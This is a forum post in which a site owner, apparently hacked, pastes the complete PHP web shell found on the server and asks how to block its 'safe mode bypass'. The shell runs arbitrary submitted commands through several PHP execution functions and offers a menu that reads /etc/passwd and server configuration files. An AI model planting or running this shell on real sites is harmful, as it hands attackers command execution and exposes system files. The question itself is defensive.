Strange php code found on my website
Posted on
16th Feb 2014 07:03 pm by
admin
I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
No comments posted yet
Your Answer:
Login to answer
167 
46 
Other forums
Change image filetype on upload?
Hi,
I've got a form which uploads an image to the server.
Is it possible to change the image t
session_destroy();
new to php
I have a simple login and am trying to write a logout.
I set a $_SESSION var to 1 i
Retreiving objects from Sessions
Hi all,
I am getting really frustrated with storing and retreiving objects from a session. Bu
Disabling SAP menu
How do I disable SAP menu for all the users and just restrict them to User Menu in SAP ECC 6.0?
Looking for help on using joining mysql tables and php....
Does anyone have any good links to references on how to pull mysql data, through joining tables and
How to make a mail Form secure?
I want to create an email Form on my web site. How can I make the Form secure so the submitted info
Material Master Update through BAPI - Follow up material not updated
Hi Experts,
I am updating the material master through a custom transaction using the BAPI
PHP submit form script causing blank page
Im trying to submit a form using this script, however nothing shows up on the page, does anyone know
Data storage spaces in varchar2
Trying to understand what's happening.
I am selecting a value from a table that is defined as c
form class help (oop php5)
Hidy Ho Neighbors,
I'm forcing myself to learn oop/classes for php5. It seems like a good id
